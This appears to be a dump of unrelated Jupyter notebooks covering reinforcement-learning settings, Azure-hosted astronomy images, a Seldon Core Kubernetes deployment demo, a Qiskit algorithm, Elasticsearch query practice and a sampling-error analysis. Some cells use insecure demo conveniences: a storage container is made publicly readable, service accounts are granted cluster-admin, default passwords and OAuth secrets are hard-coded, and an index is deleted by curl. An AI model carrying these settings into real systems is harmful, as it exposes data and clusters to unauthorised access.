# parser.add_argument("--use-gym-monitor-flag", action="store_true", help='record gym results')
# parser.add_argument("--record-video-every", type=int, default=1, help='record video every xx episodes')
# parser.add_argument("--monitor-dir", type=str, default='./results/gym_ddpg', help='directory for storing gym results')
# parser.add_argument("--summary-dir", type=str, default='./results/tf_ddpg/HalfCheetah-v2/ddpg_Tau_0.001_run1', help='directory for storing tensorboard info')
# parser.set_defaults(use_gym_monitor=False)
# # args = vars(parser.parse_args())
# # args = parser.parse_args()
# args = vars(parser.parse_args())
# pp.pprint(args)
# if not os.path.exists(args['summary_dir']):
# os.makedirs(args['summary_dir'])
# log_dir = os.path.join(args['summary_dir'], 'ddpg_running_log.log')
# logging.basicConfig(filename=log_dir, filemode='a', level=logging.INFO)
# for key in args.keys():
# logging.info('{0}: {1}'.format(key, args[key]))
# main(args)
# # python ddpg_discrete_action.py --env
# +
args = {'actor_lr': 0.0001,
'buffer_size': 1000000,
'continuous_act_space_flag': True,
'critic_lr': 0.001,
'double_ddpg_flag': True,
'env': 'RoboschoolAnt-v1',
'epsilon_decay': 0.001,
'epsilon_max': 1.0,
'epsilon_min': 0.01,
'exploration_strategy': 'epsilon_greedy',
'gamma': 0.99,
'max_episodes': 5000,
'minibatch_size': 64,
'monitor_dir': './results/gym_ddpg',
'random_seed': 1234,
'record_video_every': 1,
'render_env_flag': False,
'summary_dir': '../results2/BipedalWalker-v2/double_ddpg_softcopy_epsilon_greedy_run_test_log3',
'target_hard_copy_flag': False,
'target_hard_copy_interval': 200,
'tau': 0.001,
'use_gym_monitor': False,
'use_gym_monitor_flag': False}
if not os.path.exists(args['summary_dir']):
os.makedirs(args['summary_dir'])
log_dir = os.path.join(args['summary_dir'], 'ddpg_running_log.log')
logging.basicConfig(filename=log_dir,
filemode='a',
level=logging.INFO,
format='%(asctime)s.%(msecs)03d %(levelname)s %(module)s - %(funcName)s: %(message)s',
datefmt="%Y-%m-%d %H:%M:%S")
for key in args.keys():
logging.info('{0}: {1}'.format(key, args[key]))
main(args)
# -
# File: ddpg_discrete_notebook.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: PoC ESO
# language: python
# name: eso
# ---
# +
#------------------------------------------------------------------------------
# Based on Repley's clothes descriptor
#------------------------------------------------------------------------------
import os, uuid, sys
#import subprocess
#import tqdm
import random
import astropy
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
#from scipy.misc import imsave
import time
#import multiprocessing
#from io import BytesIO
from astropy.io import fits
#from functools import partial
from azure.storage.blob import BlockBlobService, PublicAccess
# +
# #!pip install azure-storage-blob
# Create the BlockBlockService that is used to call the Blob service
# for the storage account
import config_blob_keys as cfg
account_name = cfg.AccountName
account_key = cfg.AccountKey
block_blob_service = BlockBlobService(account_name=account_name,
account_key=account_key)
container_name_proc = cfg.ContNameProc
block_blob_service.set_container_acl(container_name_proc,
public_access=PublicAccess.Container)
# +
# Create a list "filelist" with the blob content
# inside the "Azure:container/folder" location
def BlobList(container, folder, filelist, verbose=False):
gen = block_blob_service.list_blobs(container, prefix=folder)
for blob in gen:
file = str(blob.name).replace(folder,'')
filelist.append(file)
if verbose == True:
print("\t Blob name: " + blob.name)
return filelist
# Download a file "blobfile" from "container" and save it
# in the file "locfile"
def DownBlob(container, blobfile, locfile, verbose=False):
if verbose == True:
print('Downloading ' + blobfile + ' to ' + locfile)
block_blob_service.get_blob_to_path(container,
blobfile,
locfile)
# Get the .fits image from blob storage and return the associated data
# It uses the DownBlob function
def VisualImage(impath, arm, imnamea, imnameb, verbose=False):
hdu_list = fits.open(impath)
#print(hdu_list.info())
hdu = hdu_list[arm]
im_data=hdu.data
im_median=np.median(im_data)
im_std=np.std(im_data)
print("Mean: ", np.mean(im_data))
print("Median: ", im_median)
print("StdDev: ", im_std)
fig, ax = plt.subplots(figsize=(4,8))
plt.imshow(im_data, origin='lower', interpolation='nearest', vmin=im_median-im_std, vmax=im_median+2*im_std)
plt.tight_layout()
plt.xlabel('x')
plt.ylabel('y')
plt.show()
fig.savefig(imnamea)
fig, ax = plt.subplots(figsize=(8,4))
plt.hist(np.ndarray.flatten(im_data), bins=50, range=[im_median/2, im_median*10])
ax.set_yscale('log')
plt.xlabel('counts')
plt.ylabel('# counts')
plt.show()
fig.savefig(imnameb)
def DisplayImage(impath, imnamea, imnameb, verbose=False):
im_data=np.load(impath)
im_median=np.median(im_data)
im_std=np.std(im_data)
print("Mean: ", np.mean(im_data))
print("Median: ", im_median)
print("StdDev: ", im_std)
fig, ax = plt.subplots(figsize=(3,4))
plt.imshow(im_data, origin='lower', interpolation='nearest', vmin=im_median-im_std, vmax=im_median+2*im_std, cmap='Greys_r')
plt.tight_layout()
plt.xlabel('x')
plt.ylabel('y')
plt.show()
fig.savefig(imnamea)
fig, ax = plt.subplots(figsize=(8,4))
plt.hist(np.ndarray.flatten(im_data), bins=50, range=[im_median/2, im_median*10])
ax.set_yscale('log')
plt.xlabel('counts')
plt.ylabel('# counts')
plt.show()
fig.savefig(imnameb)
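# Both display helpers above window the colour scale to
# [median - std, median + 2*std], which keeps bright outliers from washing
# out the image. A minimal, self-contained sketch of that windowing:

```python
import numpy as np

def display_window(im_data):
    """Return the (vmin, vmax) window used by VisualImage/DisplayImage."""
    im_median = np.median(im_data)
    im_std = np.std(im_data)
    return im_median - im_std, im_median + 2 * im_std

rng = np.random.default_rng(0)
vmin, vmax = display_window(rng.normal(100.0, 5.0, size=(64, 64)))
print(vmin < 100.0 < vmax)  # True
```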
# +
# Bias Blue
#BlobSubDirs = 'bias_blue'#, 'bias_red', 'blue_arc_flat','red_arc_flat']
#blob_sub_dir = BlobSubDirs
#good_file = 'UVES.2010-05-09T10:48:24.977.fits'
#bad_file = 'UVES.2010-10-26T09:32:08.896.fits'
#fits_files = [good_file, bad_file]
#arm = 0
# Bias Blue
cont_name_desc = 'processed'
blob_sub_dir = 'UVES_BLUE_WAVE'
extension = 'ext1'
nsample=5
npy_folder_rem = os.path.join('numpy', blob_sub_dir)
npy_folder_rem = os.path.join(npy_folder_rem, extension)
npy_files_list = []
BlobList(cont_name_desc, npy_folder_rem, npy_files_list)
if len(npy_files_list) >= nsample:
npy_files_list = random.sample(npy_files_list, nsample)
#files_dict = {'good':['UVES.2016-09-14T10:02:58.217.fits', 'UVES.2017-05-07T08:58:17.533.fits','UVES.2019-03-02T09:48:36.576.fits'],
# 'bad_set2':['UVES.2015-12-09T08:48:05.206.fits', 'UVES.2018-05-09T11:18:08.186.fits', 'UVES.2015-12-07T08:55:07.048.fits'],
# 'bad':['UVES.2010-10-26T09:35:11.190.fits']}
#files_dict = {'good':['UVES.2016-09-14T10:02:58.217.fits', 'UVES.2017-05-07T08:58:17.533.fits','UVES.2019-03-02T09:48:36.576.fits'],
# 'bad_set1':['UVES.2010-10-26T09:32:08.896.fits', 'UVES.2010-10-26T09:32:54.480.fits', 'UVES.2010-10-26T09:33:40.043.fits'],
# 'bad_set2':['UVES.2015-12-09T08:48:05.206.fits', 'UVES.2018-05-09T11:18:08.186.fits', 'UVES.2015-12-07T08:55:07.048.fits']}
#print(files_dict)
arm = 0
# Blue Arc Flat
#BlobSubDirs = 'blue_arc_flat'#, 'bias_red', 'blue_arc_flat','red_arc_flat']
#blob_sub_dir = BlobSubDirs
#good_file = 'UVES.2010-02-27T17:48:25.456.fits'
#bad_file = 'UVES.2015-12-05T20:55:25.270.fits'
#fits_files = [good_file, bad_file]
#arm = 1
# Red Arc Flat
#BlobSubDirs = 'red_arc_flat'#, 'bias_red', 'blue_arc_flat','red_arc_flat']
#blob_sub_dir = BlobSubDirs
#good_file = 'UVES.2010-07-30T23:36:46.453.fits'
#bad_file = 'UVES.2014-01-11T18:47:56.548.fits'
#fits_files = [good_file, bad_file]
#arm = 1
path_loc = './Test'
#for file in fits_files:
for npy_file in npy_files_list:
print("\nProcessing image file : ", npy_file)
loc_file = path_loc + npy_file
rem_file = npy_folder_rem + npy_file
DownBlob(cont_name_desc, rem_file, loc_file, True)
while not os.path.exists(loc_file):
time.sleep(0.1)
imnamea = loc_file.replace('.npy', 'a.png')
imnameb = loc_file.replace('.npy', 'b.png')
DisplayImage(loc_file, imnamea, imnameb)
#VisualImage(loc_file, arm, imnamea, imnameb)
# -
# File: data_proccessing/10_Visualize_Image.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Deploying Machine Learning Models Minikube with RBAC using kubectl
# This demo shows how you can interact directly with kubernetes using kubectl to create and manage runtime machine learning models. It uses Minikube as the target Kubernetes cluster.
# <img src="images/deploy-graph.png" alt="predictor with canary" title="ml graph"/>
# ## Prerequisites
# You will need
# - [Git clone of Seldon Core](https://github.com/SeldonIO/seldon-core)
# - [Helm](https://github.com/kubernetes/helm)
# - [Minikube](https://github.com/kubernetes/minikube) version v0.24.0 or greater
# - [python grpc tools](https://grpc.io/docs/quickstart/python.html)
#
# # Create Cluster
#
# Start minikube and ensure custom resource validation is activated and there is at least 4GB of memory.
#
# **2018-06-13** : At present we find the most stable version of minikube across platforms is 0.25.2, as there are issues with 0.26 and 0.27 on some systems. We also find the default VirtualBox driver can be problematic on some systems, so we suggest using the [KVM2 driver](https://github.com/kubernetes/minikube/blob/master/docs/drivers.md#kvm2-driver).
#
# Your start command would then look like:
# ```
# minikube start --vm-driver kvm2 --memory 4096 --feature-gates=CustomResourceValidation=true --extra-config=apiserver.Authorization.Mode=RBAC
# ```
# # Setup
# !kubectl create namespace seldon
# !kubectl create clusterrolebinding kube-system-cluster-admin --clusterrole=cluster-admin --serviceaccount=kube-system:default
# # Install Helm
# !kubectl -n kube-system create sa tiller
# !kubectl create clusterrolebinding tiller --clusterrole cluster-admin --serviceaccount=kube-system:tiller
# !helm init --service-account tiller
# Label the node to allow load testing to run on it
# !kubectl label nodes `kubectl get nodes -o jsonpath='{.items[0].metadata.name}'` role=locust --overwrite
# ## Start seldon-core
# Install the custom resource definition
# !helm install ../helm-charts/seldon-core-crd --name seldon-core-crd --set usage_metrics.enabled=true
# !helm install ../helm-charts/seldon-core --name seldon-core --namespace seldon
# Install prometheus and grafana for analytics
# !helm install ../helm-charts/seldon-core-analytics --name seldon-core-analytics \
# --set grafana_prom_admin_password=password \
# --set persistence.enabled=false \
# --namespace seldon
# Check all services are running before proceeding.
# !kubectl get pods -n seldon
# ## Set up REST and gRPC methods
#
# **Ensure you port forward the seldon api-server REST and GRPC ports**:
#
# REST:
# ```
# kubectl port-forward $(kubectl get pods -n seldon -l app=seldon-apiserver-container-app -o jsonpath='{.items[0].metadata.name}') -n seldon 8002:8080
# ```
#
# GRPC:
# ```
# kubectl port-forward $(kubectl get pods -n seldon -l app=seldon-apiserver-container-app -o jsonpath='{.items[0].metadata.name}') -n seldon 8003:5000
# ```
# Install gRPC modules for the prediction protos.
# !cp ../proto/prediction.proto ./proto
# !python -m grpc.tools.protoc -I. --python_out=. --grpc_python_out=. ./proto/prediction.proto
# Illustration of both REST and gRPC requests.
# +
import requests
from requests.auth import HTTPBasicAuth
from proto import prediction_pb2
from proto import prediction_pb2_grpc
import grpc
try:
from commands import getoutput # python 2
except ImportError:
from subprocess import getoutput # python 3
API_HTTP="localhost:8002"
API_GRPC="localhost:8003"
def get_token():
payload = {'grant_type': 'client_credentials'}
response = requests.post(
"http://"+API_HTTP+"/oauth/token",
auth=HTTPBasicAuth('oauth-key', 'oauth-secret'),
data=payload)
print(response.text)
token = response.json()["access_token"]
return token
def rest_request():
token = get_token()
headers = {'Authorization': 'Bearer '+token}
payload = {"data":{"names":["a","b"],"tensor":{"shape":[2,2],"values":[0,0,1,1]}}}
response = requests.post(
"http://"+API_HTTP+"/api/v0.1/predictions",
headers=headers,
json=payload)
print(response.text)
def grpc_request():
token = get_token()
datadef = prediction_pb2.DefaultData(
names = ["a","b"],
tensor = prediction_pb2.Tensor(
shape = [3,2],
values = [1.0,1.0,2.0,3.0,4.0,5.0]
)
)
request = prediction_pb2.SeldonMessage(data = datadef)
channel = grpc.insecure_channel(API_GRPC)
stub = prediction_pb2_grpc.SeldonStub(channel)
metadata = [('oauth_token', token)]
response = stub.Predict(request=request,metadata=metadata)
print(response)
# -
# # Integrating with Kubernetes API
# ## Validation
# Using the OpenAPI schema, certain basic validation can be done before the custom resource is accepted.
# !kubectl create -f resources/model_invalid1.json -n seldon
# ## Normal Operation
# A simple example is shown below; we use a single prepacked model for illustration. The spec contains a set of predictors, each of which contains a ***componentSpec*** (a Kubernetes [PodTemplateSpec](https://kubernetes.io/docs/api-reference/v1.9/#podtemplatespec-v1-core)) alongside a ***graph*** that describes how the components fit together.
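# As a rough outline of the resource just described (field names follow the
# description above and common SeldonDeployment examples; exact field names
# and shapes may differ by CRD version, so treat this as a sketch and consult
# `resources/model.json` for the authoritative manifest):

```python
import json

# Hypothetical, abbreviated outline -- not a complete or validated manifest.
seldon_deployment = {
    "apiVersion": "machinelearning.seldon.io/v1alpha2",
    "kind": "SeldonDeployment",
    "metadata": {"name": "seldon-deployment-example"},
    "spec": {
        "predictors": [{
            "name": "main",
            "replicas": 1,
            # the componentSpec: a Kubernetes PodTemplateSpec
            "componentSpecs": [{
                "spec": {"containers": [{"name": "classifier",
                                         "image": "seldonio/mock_classifier:1.0"}]}
            }],
            # the graph: how the components fit together
            "graph": {"name": "classifier",
                      "type": "MODEL",
                      "endpoint": {"type": "REST"}},
        }]
    },
}
print(json.dumps(seldon_deployment)[:60])
```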
# !pygmentize resources/model.json
# ## Create Seldon Deployment
# Deploy the runtime graph to kubernetes.
# !kubectl apply -f resources/model.json -n seldon
# !kubectl get seldondeployments -n seldon
# !kubectl describe seldondeployments seldon-deployment-example -n seldon
# Get the status of the SeldonDeployment. **When ready the replicasAvailable should be 1**.
# !kubectl get seldondeployments seldon-deployment-example -o jsonpath='{.status}' -n seldon
# ## Get predictions
# #### REST Request
rest_request()
# #### gRPC Request
grpc_request()
# ## Update deployment with canary
# We will change the deployment to add a "canary" deployment. This illustrates:
# - Updating a deployment with no downtime
# - Adding an extra predictor to run alongside the existing predictor.
#
# You could manage different traffic levels by controlling the number of replicas of each.
# !pygmentize resources/model_with_canary.json
# !kubectl apply -f resources/model_with_canary.json -n seldon
# Check the status of the deployments. Note: **Might need to run several times until replicasAvailable is 1 for both predictors**.
# !kubectl get seldondeployments seldon-deployment-example -o jsonpath='{.status}' -n seldon
# #### REST Request
rest_request()
# #### gRPC request
grpc_request()
# ## Load test
# Start a load test which will post REST requests at 10 requests per second.
# !helm install seldon-core-loadtesting --name loadtest \
# --set locust.host=http://seldon-core-seldon-apiserver:8080 \
# --set oauth.key=oauth-key \
# --set oauth.secret=oauth-secret \
# --namespace seldon \
# --repo https://storage.googleapis.com/seldon-charts
# You should port-foward the grafana dashboard
#
# ```bash
# kubectl port-forward $(kubectl get pods -n seldon -l app=grafana-prom-server -o jsonpath='{.items[0].metadata.name}') -n seldon 3000:3000
# ```
#
# You can then view an analytics dashboard inside the cluster at http://localhost:3000/dashboard/db/prediction-analytics?refresh=5s&orgId=1. Your IP address may differ; get it via `minikube ip`. Log in with:
# - Username : admin
# - password : password (as set when starting seldon-core-analytics above)
#
# The dashboard should look like below:
#
#
# <img src="images/dashboard.png" alt="predictor with canary" title="ml graph"/>
# # Tear down
# !helm delete loadtest --purge
# !kubectl delete -f resources/model_with_canary.json -n seldon
# !helm delete seldon-core-analytics --purge
# !helm delete seldon-core --purge
# !helm delete seldon-core-crd --purge
# File: notebooks/kubectl_demo_minikube_rbac.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## _*The EOH (Evolution of Hamiltonian) Algorithm*_
#
# This notebook demonstrates how to use the `Qiskit Aqua` library to invoke the EOH algorithm and process the result.
#
# Further information may be found for the algorithms in the online [Aqua documentation](https://qiskit.org/documentation/aqua/algorithms.html).
#
# For this particular demonstration, we illustrate the `EOH` algorithm. First, we create two `WeightedPauliOperator` instances from randomly generated Hermitian matrices, which serve as our Hamiltonians.
# +
import numpy as np
from qiskit import BasicAer
from qiskit.transpiler import PassManager
from qiskit.aqua import QuantumInstance
from qiskit.aqua.operators import MatrixOperator, op_converter
from qiskit.aqua.algorithms import EOH
from qiskit.aqua.components.initial_states import Custom
num_qubits = 2
temp = np.random.random((2 ** num_qubits, 2 ** num_qubits))
qubit_op = op_converter.to_weighted_pauli_operator(MatrixOperator(matrix=temp + temp.T))
temp = np.random.random((2 ** num_qubits, 2 ** num_qubits))
evo_op = op_converter.to_weighted_pauli_operator(MatrixOperator(matrix=temp + temp.T))
# -
# For EOH, we would like to evolve some initial state (e.g. the uniform superposition state) with `evo_op` and do a measurement using `qubit_op`. Below, we illustrate how such an example dynamics process can be easily prepared.
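# For intuition, the same dynamics can be written directly in linear algebra
# (exact statevector arithmetic with dense matrices, assuming few qubits; EOH
# itself builds a Trotterized circuit instead):

```python
import numpy as np

rng = np.random.default_rng(42)
dim = 2 ** 2                       # two qubits, as above
tmp = rng.random((dim, dim))
H_obs = tmp + tmp.T                # stands in for qubit_op
tmp = rng.random((dim, dim))
H_evo = tmp + tmp.T                # stands in for evo_op

# U = exp(-i * H_evo * t), built from the eigendecomposition of Hermitian H_evo
evo_time = 1.0
w, V = np.linalg.eigh(H_evo)
U = V @ np.diag(np.exp(-1j * w * evo_time)) @ V.conj().T

psi0 = np.ones(dim) / np.sqrt(dim)  # uniform superposition
psi_t = U @ psi0                    # evolve with evo_op
expectation = np.vdot(psi_t, H_obs @ psi_t).real  # measure qubit_op
print(expectation)
```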
evo_time = 1
num_time_slices = 1
state_in = Custom(qubit_op.num_qubits, state='uniform')
eoh = EOH(qubit_op, state_in, evo_op, evo_time=evo_time, num_time_slices=num_time_slices)
# We can then configure the quantum backend and execute our `EOH` instance:
# +
backend = BasicAer.get_backend('statevector_simulator')
quantum_instance = QuantumInstance(backend)
ret = eoh.run(quantum_instance)
print('The result is\n{}'.format(ret))
# File: aqua/eoh.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .sh
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Bash
# language: bash
# name: bash
# ---
# +
curl -XDELETE localhost:9200/klausurvorbereitung?pretty
curl -XPUT localhost:9200/klausurvorbereitung?pretty -d'
{
"mappings" : {
"movies" : {
"properties": {
"title" : {
"type" : "text",
"analyzer" : "standard"
},
"year" : {
"type" : "short"
},
"runtime" : {
"type": "short"
},
"director": {
"type": "keyword"
},
"videocodec": {
"type": "keyword"
},
"budget": {
"type": "integer"
}
}
}
}
}'
# Example:
# Title = Pulp Fiction
# Year = 1994
# director = <NAME>
# videocodec = x264 (could also be: h264, AVC, h265, MPEG-2, MPEG-4, XviD)
# +
curl -XPOST localhost:9200/klausurvorbereitung/movies?pretty -d'{
"title": "Pulp Fiction",
"year": 1994,
"director": "<NAME>",
"videocodec": "AVC",
"budget": 100
}'
curl -XPOST localhost:9200/klausurvorbereitung/movies?pretty -d'{
"title": "Reservoir Dogs",
"year": 1992,
"director": "<NAME>",
"videocodec": "AVC",
"budget": 100
}'
curl -XPOST localhost:9200/klausurvorbereitung/movies?pretty -d'{
"title": "<NAME>",
"year": 1997,
"director": "<NAME>",
"videocodec": "x264",
"budget": 100
}'
curl -XPOST localhost:9200/klausurvorbereitung/movies?pretty -d'{
"title": "Kill Bill Vol.1",
"year": 2003,
"director": "<NAME>",
"videocodec": "AVC",
"budget": 100
}'
curl -XPOST localhost:9200/klausurvorbereitung/movies?pretty -d'{
"title": "Kill Bill Vol.2",
"year": 2004,
"director": "<NAME>",
"videocodec": "AVC",
"budget": 100
}'
curl -XPOST localhost:9200/klausurvorbereitung/movies?pretty -d'{
"title": "Full Metal Jacket",
"year": 1987,
"director": "<NAME>",
"videocodec": "x264",
"budget": 150
}'
curl -XPOST localhost:9200/klausurvorbereitung/movies?pretty -d'{
"title": "2001: A Space Odyssey",
"year": 1968,
"director": "<NAME>",
"videocodec": "x264",
"budget": 200
}'
# -
curl -XPOST localhost:9200/klausurvorbereitung/movies/_search?pretty -d '{
"query" :{
"match" : {
"title" : "kill"
}
}
}'
curl -XPOST localhost:9200/klausurvorbereitung/movies/_search?pretty -d '
{
"query" :{
"bool": {
"must": {
"term" : {
"videocodec" : "AVC"
}
},
"filter": [
{"range": { "year": { "from" : 1994, "to": 2000} } }
]
}
}
}'
curl -XGET 'localhost:9200/klausurvorbereitung/_search?pretty'
# ### Note:
# By default, queries will use the analyzer defined in the field mapping,
# but this can be overridden with the `search_analyzer` setting.
curl -XPOST localhost:9200/klausurvorbereitung/movies/_search?pretty -d '
{
"size":0,
"aggs" :{
"by_codec" : {
"terms" : {
"field" : "videocodec"
},
"aggs": {
"by_year": {
"terms": {
"field": "year"
}
}
}
}
}
}'
# +
curl -XPOST 'localhost:9200/klausurvorbereitung/movies/_search?pretty' -d '
{
"size": 0,
"aggs":{
"by_director": {
"terms": {
"field": "director"
},
"aggs": {
"sum_budget": {
"stats": { "field": "budget" }
}
}
}
}
}'
# -
curl -XGET 'http://localhost:9200/klausurvorbereitung/movies/_search?pretty' -d '
{
"query": {
"fuzzy" : {
"title" : "Rexervoir"
}
}
}
'
# <NAME>
# <NAME>
# <NAME>
# <NAME>
# ...
#
# File: Klausurvorbereitung.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# # Analysing the results of hybrid PBC
#
# In this notebook, we will analyse the results obtained for the **Toy Example 2** using our hybrid PBC script.
#
# We run the script simulating **1 virtual qubit** and demanding a precision $\epsilon_{desired} = 0.01\,.$
#
# The number of samples is being determined as:
# $$
# N = \frac{20 \cdot \sum_{i=1}^{\chi} \alpha_i^2}{\epsilon^2_{desired}}\,,
# $$
# and the actual relative error $\epsilon_{actual}$ as:
#
# $$
# \epsilon_{actual} = \sqrt{20} \frac{\sigma_{samples}}{\sqrt{N}}\,.
# $$
#
# Note that since necessarily $\sigma_{samples}^2 \leq \sum_{i=1}^{\chi} \alpha_i^2$ then $\epsilon_{actual} \leq \epsilon_{desired}\,.$
#
# As a result, we will have 95%-confidence intervals given by $\mathbb{E}(\xi) \pm \epsilon_{actual}\,.$
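# A quick numeric check of the two formulas above, using the one-virtual-qubit
# weights $\{1/2,\,(1-\sqrt{2})/2,\,1/\sqrt{2}\}$ (the same weights appear in the
# `nr_samples` helper below); the worst case uses the bound
# $\sigma_{samples} \leq \sqrt{\sum_i \alpha_i^2}$:

```python
import math
from math import sqrt

alphas = [1 / 2, (1 - sqrt(2)) / 2, 1 / sqrt(2)]
sum_squares = sum(a ** 2 for a in alphas)

eps_desired = 0.01
N = math.ceil(20 * sum_squares / eps_desired ** 2)
print(N)  # 158579

# Worst-case actual error (sigma_samples at its upper bound):
eps_actual_max = sqrt(20) * sqrt(sum_squares) / sqrt(N)
print(eps_actual_max <= eps_desired)  # True
```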
# +
import math
import json
import numpy as np
from math import sqrt
from matplotlib import pyplot as plt
# -
def nr_samples(precision, virtual_qubits):
weights_1vq = [1 / 2, (1 - sqrt(2)) / 2, 1 / sqrt(2)]
sum_squares = 0
for i in range(3**virtual_qubits):
label = np.base_repr(i, base=3)
label = str(label)
if not len(label) == virtual_qubits:
label = '0' * (virtual_qubits - len(label)) + label
weight = 1
for s in label:
weight = weight * weights_1vq[int(s)]
sum_squares += abs(weight)**2
N = int(math.ceil(20 * sum_squares / precision**2))
return N
# +
precision = [0.1, 0.09, 0.07, 0.05, 0.03, 0.02, 0.01]
vq = 1 # choosing 1 virtual qubit
samples = []
for p in precision:
samples.append(nr_samples(p, vq))
print(samples)
# -
# Because we ran the code for the precision $\epsilon = 0.01$, we should have a total of $158\,579$ values to use for the computation of the probability $p\,.$
# We can use those values to estimate the expected value of this probability and determine how close it is to the exact value $p= 1/2 - \sqrt{2}/4.$
#
# We can also determine the standard deviation of the sample, and use it to compute the appropriate confidence interval.
#
# Since we have access to smaller sets of values as well, we can use the first $M$ values to estimate the results that would have been obtained if we had requested a different precision (e.g., $\epsilon = \{ 0.10,\, 0.09,\, 0.07,\, 0.05,\, 0.03,\, 0.02 \}$).
exact_value = 1/2 - sqrt(2)/4
print(round(exact_value, 6))
# + [markdown] tags=[]
# ## $\epsilon = 0.01 \Rightarrow N= 158\, 579$
# -
with open('Resources_data--probabilities.txt', 'r') as file_object:
probabilities1 = json.load(file_object)
# +
probabilities1 = np.array(probabilities1)
prec = precision[-1]
print(len(probabilities1) == samples[-1])
mean1 = np.mean(probabilities1)
std1 = np.std(probabilities1)
error1 = sqrt(20) * std1 / sqrt(len(probabilities1))
print(f'p= {round(mean1, 4)} +/- {round(error1, 4)}')
print(error1 < prec)
# + [markdown] jp-MarkdownHeadingCollapsed=true tags=[]
# ## $\epsilon = 0.02 \Rightarrow N= 39\, 645$
# -
probabilities2 = probabilities1[0:samples[-2]]
# +
prec = precision[-2]
print(len(probabilities2) == samples[-2])
mean2 = np.mean(probabilities2)
std2 = np.std(probabilities2)
error2 = sqrt(20) * std2 / sqrt(len(probabilities2))
print(f'p= {round(mean2, 4)} +/- {round(error2, 4)}')
print(error2 < prec)
# + [markdown] jp-MarkdownHeadingCollapsed=true tags=[]
# ## $\epsilon = 0.03 \Rightarrow N= 17\, 620$
# -
probabilities3 = probabilities1[0:samples[-3]]
# +
prec = precision[-3]
print(len(probabilities3) == samples[-3])
mean3 = np.mean(probabilities3)
std3 = np.std(probabilities3)
error3 = sqrt(20) * std3 / sqrt(len(probabilities3))
print(f'p= {round(mean3, 4)} +/- {round(error3, 4)}')
print(error3 < prec)
# + [markdown] jp-MarkdownHeadingCollapsed=true tags=[]
# ## $\epsilon = 0.05 \Rightarrow N= 6\, 344$
# -
probabilities4 = probabilities1[0:samples[-4]]
# +
prec = precision[-4]
print(len(probabilities4) == samples[-4])
mean4 = np.mean(probabilities4)
std4 = np.std(probabilities4)
error4 = sqrt(20) * std4 / sqrt(len(probabilities4))
print(f'p= {round(mean4, 4)} +/- {round(error4, 4)}')
print(error4 < prec)
# + [markdown] jp-MarkdownHeadingCollapsed=true tags=[]
# ## $\epsilon = 0.07 \Rightarrow N= 3\, 237$
# -
probabilities5 = probabilities1[0:samples[-5]]
# +
prec = precision[-5]
print(len(probabilities5) == samples[-5])
mean5 = np.mean(probabilities5)
std5 = np.std(probabilities5)
error5 = sqrt(20) * std5 / sqrt(len(probabilities5))
print(f'p= {round(mean5, 4)} +/- {round(error5, 4)}')
print(error5 < prec)
# + [markdown] jp-MarkdownHeadingCollapsed=true tags=[]
# ## $\epsilon = 0.09 \Rightarrow N= 1\, 958$
# -
probabilities6 = probabilities1[0:samples[-6]]
# +
prec = precision[-6]
print(len(probabilities6) == samples[-6])
mean6 = np.mean(probabilities6)
std6 = np.std(probabilities6)
error6 = sqrt(20) * std6 / sqrt(len(probabilities6))
print(f'p= {round(mean6, 4)} +/- {round(error6, 4)}')
print(error6 < prec)
# + [markdown] jp-MarkdownHeadingCollapsed=true tags=[]
# ## $\epsilon = 0.10 \Rightarrow N= 1\, 586$
# -
probabilities7 = probabilities1[0:samples[-7]]
# +
prec = precision[-7]
print(len(probabilities7) == samples[-7])
mean7 = np.mean(probabilities7)
std7 = np.std(probabilities7)
error7 = sqrt(20) * std7 / sqrt(len(probabilities7))
print(f'p= {round(mean7, 4)} +/- {round(error7, 4)}')
print(error7 < prec)
# -
# ---
# + [markdown] tags=[]
# ## Plotting the data:
# +
means = [mean7, mean6, mean5, mean4, mean3, mean2, mean1]
errors = [error7, error6, error5, error4, error3, error2, error1]
bot_bar = [means[i] - errors[i] for i in range(len(means))]
heights = [2*errors[i] for i in range(len(means))]
# +
fig = plt.figure()
plt.bar([i for i in range(len(means))],
heights,
width=0.8,
bottom=bot_bar,
align='center',
color='lightblue',
label='Results: 95% CI')
plt.errorbar([i for i in range(len(means))],
means,
color='blue',
marker='D',
markersize=4,
linestyle='None',
label='Results: means')
plt.errorbar([i for i in range(len(means))],
[exact_value for _ in range(len(means))],
color='green',
marker='o',
markersize=4,
linestyle='None',
label='Exact result')
plt.errorbar([i for i in range(len(means))],
means,
yerr=precision,
color='red',
marker='None',
markersize=4,
linestyle='None',
label='Precision bound')
plt.xticks([i for i in range(len(means))], precision, size=14)
plt.xlabel(r'$\epsilon$', fontsize=16)
#plt.ylim([0.05, 0.25])
plt.yticks(size=14)
plt.ylabel(r'$p$', fontsize=16)
plt.legend(fontsize=14)
plt.title('Hybrid PBC - Toy Example 2 (1 virtual qubit)', fontsize=18)
plt.show()
# +
fig = plt.figure(constrained_layout=True, figsize=(10, 8))
subfigs = fig.subfigures(2, 1, hspace=0.07)
# Upper subfigure
subplot = subfigs[0].add_subplot(111)
plt.bar([i for i in range(len(means))],
heights,
width=0.8,
bottom=bot_bar,
align='center',
color='lightblue',
label='Results: 95% CI')
plt.errorbar([i for i in range(len(means))],
means,
color='blue',
marker='D',
markersize=4,
linestyle='None',
label='Results: means')
plt.errorbar([i for i in range(len(means))],
[exact_value for _ in range(len(means))],
color='green',
marker='o',
markersize=4,
linestyle='None',
linewidth=1,
label='Exact result')
plt.errorbar([i for i in range(len(means))],
means,
yerr=precision,
color='red',
marker='None',
markersize=4,
linestyle='None',
label='Precision bound')
plt.plot(np.arange(-1, 8, 1), [exact_value for _ in np.arange(-1, 8, 1)],
'--',
color='green',
linewidth=1)
plt.xlim([-0.75, 6.75])
